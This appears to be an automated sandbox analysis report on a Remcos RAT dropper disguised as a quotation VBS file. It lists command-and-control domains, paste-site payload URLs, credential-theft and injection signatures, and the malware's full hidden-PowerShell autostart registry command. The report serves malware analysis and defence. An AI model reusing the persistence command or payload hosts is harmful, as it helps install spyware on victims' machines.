85.120.16.93, 443, 49710 RCS-RDS73-75DrStaicoviciRO Romania 29->92 94 desckvbrat.com.br 191.252.83.213, 21, 49704, 49705 LocawebServicosdeInternetSABR Brazil 29->94 96 paste.ee 188.114.96.3, 443, 49706, 49709 CLOUDFLARENETUS European Union 29->96 78 C:\Users\user\AppData\Roaming\...\nliem.ps1, Unicode 29->78 dropped 150 Self deletion via cmd or bat file 29->150 152 Adds a directory exclusion to Windows Defender 29->152 46 powershell.exe 11 29->46         started        50 cmd.exe 11 29->50         started        52 powershell.exe 23 29->52         started        54 3 other processes 29->54 154 Detected Remcos RAT 36->154 file10 signatures11 process12 dnsIp13 98 pastebin.com 104.20.4.235, 443, 49725, 49759 CLOUDFLARENETUS United States 46->98 156 Writes to foreign memory regions 46->156 158 Injects a PE file into a foreign processes 46->158 56 AddInProcess32.exe 46->56         started        61 AddInProcess32.exe 46->61         started        160 Suspicious powershell command line found 50->160 162 Wscript starts Powershell (via cmd or directly) 50->162 164 Loading BitLocker PowerShell Module 52->164 63 WmiPrvSE.exe 2 52->63         started        166 Creates autostart registry keys with suspicious values (likely registry only malware) 54->166 signatures14 process15 dnsIp16 86 janbours92harbu03.duckdns.org 192.169.69.26, 3980, 49733 WOWUS United States 56->86 88 janbours92harbu04.duckdns.org 172.111.244.100, 3981, 49790, 49801 M247GB United States 56->88 90 geoplugin.net 178.237.33.50, 49807, 80 ATOM86-ASATOM86NL Netherlands 56->90 74 C:\...\kevzykrtgrszbixbneqedqimjxlmbhz.vbs, data 56->74 dropped 76 C:\ProgramData\remcos\logs.dat, data 56->76 dropped 128 Detected Remcos RAT 56->128 130 Maps a DLL or memory area into another process 56->130 132 Installs a global keyboard hook 56->132 65 AddInProcess32.exe 56->65         started        68 AddInProcess32.exe 56->68         started        70 AddInProcess32.exe 56->70         started        72 wscript.exe 56->72         started        134 Contains functionality to bypass UAC (CMSTPLUA) 61->134 136 Tries to steal Mail credentials (via file registry) 61->136 138 Contains functionalty to change the wallpaper 61->138 140 4 other signatures 61->140 file17 signatures18 process19 signatures20 100 Tries to steal Instant Messenger accounts or passwords 65->100 102 Tries to steal Mail credentials (via file / registry access) 65->102 104 Tries to harvest and steal browser information (history, passwords, etc) 68->104

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Quotation request YN2024-10-07pdf.vbs3%VirustotalBrowse
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    paste.ee1%VirustotalBrowse
                    geoplugin.net0%VirustotalBrowse
                    janbours92harbu04.duckdns.org6%VirustotalBrowse
                    simonastolerciuc.ro1%VirustotalBrowse
                    pastebin.com0%VirustotalBrowse
                    desckvbrat.com.br7%VirustotalBrowse
                    janbours92harbu03.duckdns.org9%VirustotalBrowse
                    ftp.desckvbrat.com.br8%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://www.imvu.comr0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://aka.ms/pscore60%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://oneget.orgX0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    https://oneget.org0%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    http://ftp.desckvbrat.com.br8%VirustotalBrowse
                    http://desckvbrat.com.br7%VirustotalBrowse
                    https://simonastolerciuc.ro/images/server.txt3%VirustotalBrowse
                    https://paste.ee/d/P0BOw/0P4%VirustotalBrowse
                    https://analytics.paste.ee1%VirustotalBrowse
                    https://paste.ee/d/P0BOw/04%VirustotalBrowse
                    https://pastebin.com/raw/pQQ0n3eA5%VirustotalBrowse
                    https://paste.ee1%VirustotalBrowse
                    https://paste.ee/d/FwIIK/04%VirustotalBrowse
                    https://www.google.com0%VirustotalBrowse
                    https://cdnjs.cloudflare.com0%VirustotalBrowse
                    https://secure.gravatar.com0%VirustotalBrowse
                    http://www.nirsoft.net/0%VirustotalBrowse
                    http://paste.ee1%VirustotalBrowse
                    http://simonastolerciuc.ro1%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                    https://simonastolerciuc.ro2%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse
                    https://www.google.com/accounts/servicelogin0%VirustotalBrowse
                    http://www.microsoft.0%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.0.htmlP0%VirustotalBrowse
                    https://themes.googleusercontent.com0%VirustotalBrowse
                    https://pastebin.com0%VirustotalBrowse
                    https://paste.ee/d/9xfVr/04%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    188.114.96.3
                    truetrueunknown
                    geoplugin.net
                    178.237.33.50
                    truefalseunknown
                    janbours92harbu04.duckdns.org
                    172.111.244.100
                    truetrueunknown
                    desckvbrat.com.br
                    191.252.83.213
                    truetrueunknown
                    simonastolerciuc.ro
                    85.120.16.93
                    truetrueunknown
                    pastebin.com
                    104.20.4.235
                    truetrueunknown
                    janbours92harbu03.duckdns.org
                    192.169.69.26
                    truetrueunknown
                    ftp.desckvbrat.com.br
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://paste.ee/d/P0BOw/0trueunknown
                    https://simonastolerciuc.ro/images/server.txttrueunknown
                    2harbu03.duckdns.orgtrue
                      unknown
                      https://pastebin.com/raw/pQQ0n3eAfalseunknown
                      https://paste.ee/d/FwIIK/0trueunknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      unknown
                      https://paste.ee/d/9xfVr/0trueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.imvu.comrAddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://ftp.desckvbrat.com.brpowershell.exe, 00000004.00000002.2230575334.000001D62AB94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B254000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://desckvbrat.com.brpowershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B254000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://paste.ee/d/P0BOw/0Ppowershell.exe, 00000004.00000002.2230575334.000001D62B5D7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://analytics.paste.eepowershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://paste.eepowershell.exe, 00000004.00000002.2230575334.000001D62B27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629D73000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore6powershell.exe, 00000002.00000002.3050157640.0000013680038000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comAddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        unknown
                        https://www.google.compowershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                        http://crl.microso$powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://crl.microsopowershell.exe, 00000005.00000002.2776493030.000001825DACA000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2230575334.000001D62B65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2955555975.000001D639BC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2616965049.00000182554D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2643079703.00000197BA9D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://oneget.orgXpowershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://login.yahoo.com/config/loginAddInProcess32.exefalse
                            • URL Reputation: safe
                            unknown
                            https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://crl.micft.cMicRosofpowershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://www.nirsoft.net/AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3050157640.00000136800AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2160647803.0000018245461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AA961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C1D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://secure.gravatar.compowershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://go.microsoft.cos$?CLpowershell.exe, 00000004.00000002.3029633737.000001D641EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://crl.microso$$powershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2230575334.000001D62B65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2955555975.000001D639BC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2616965049.00000182554D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2643079703.00000197BA9D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2214552763.00000210D1DD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://simonastolerciuc.ropowershell.exe, 00000004.00000002.2230575334.000001D62A107000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://simonastolerciuc.ropowershell.exe, 00000004.00000002.2230575334.000001D62A10B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://paste.eepowershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2160647803.0000018245682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://go.micropowershell.exe, 00000004.00000002.2230575334.000001D62AB94000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.google.com;powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://crl.micpowershell.exe, 00000006.00000002.2825477153.00000197C30AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.imvu.comAddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2146116914.00000210C3734000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.microsoft.powershell.exe, 00000005.00000002.2774841389.000001825D7C0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2146116914.00000210C1F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                        https://simonastolerciuc.ro/images/sppowershell.exe, 00000004.00000002.2230575334.000001D62A107000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2160647803.0000018245682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://analytics.paste.ee;powershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.google.com/accounts/serviceloginAddInProcess32.exefalseunknown
                                            https://paste.ee/d/9xfVr/0Ppowershell.exe, 00000004.00000002.2230575334.000001D62B27D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.3050157640.0000013680098000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2160647803.0000018245461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2160885075.00000197AA961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2146116914.00000210C1D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlPpowershell.exe, 00000008.00000002.2146116914.00000210C35E9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://pastebin.compowershell.exe, 0000000D.00000002.2247922722.0000021A80492000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2230575334.000001D62B2D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B62D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62B2A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D62A0E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                              https://oneget.orgpowershell.exe, 00000008.00000002.2146116914.00000210C3383000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.ebuddy.comAddInProcess32.exe, AddInProcess32.exe, 0000001D.00000002.2375459966.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              85.120.16.93
                                              simonastolerciuc.roRomania
                                              8708RCS-RDS73-75DrStaicoviciROtrue
                                              104.20.4.235
                                              pastebin.comUnited States
                                              13335CLOUDFLARENETUStrue
                                              172.111.244.100
                                              janbours92harbu04.duckdns.orgUnited States
                                              9009M247GBtrue
                                              188.114.96.3
                                              paste.eeEuropean Union
                                              13335CLOUDFLARENETUStrue
                                              178.237.33.50
                                              geoplugin.netNetherlands
                                              8455ATOM86-ASATOM86NLfalse
                                              191.252.83.213
                                              desckvbrat.com.brBrazil
                                              27715LocawebServicosdeInternetSABRtrue
                                              192.169.69.26
                                              janbours92harbu03.duckdns.orgUnited States
                                              23033WOWUStrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1527623
                                              Start date and time:2024-10-07 07:08:05 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Quotation request YN2024-10-07pdf.vbs
                                              Detection:MAL
                                              Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@47/35@7/7
                                              EGA Information:
                                              • Successful, ratio: 58.3%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 169
                                              • Number of non-executed functions: 242
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs
                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 1644 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 3200 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 5500 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7176 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              TimeTypeDescription
                                              01:08:57API Interceptor122x Sleep call for process: powershell.exe modified
                                              01:09:48API Interceptor5014x Sleep call for process: AddInProcess32.exe modified
                                              07:09:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_khx cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                              07:09:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_khx cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              85.120.16.93zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                                                    • pastebin.com/raw/V9y5Q5vv
                                                    sostener.vbsGet hashmaliciousXWormBrowse
                                                    • pastebin.com/raw/V9y5Q5vv
                                                    envifa.vbsGet hashmaliciousRemcosBrowse
                                                    • pastebin.com/raw/V9y5Q5vv
                                                    New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                    • pastebin.com/raw/NsQ5qTHr
                                                    188.114.96.3http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • revexhibition.pages.dev/favicon.ico
                                                    http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
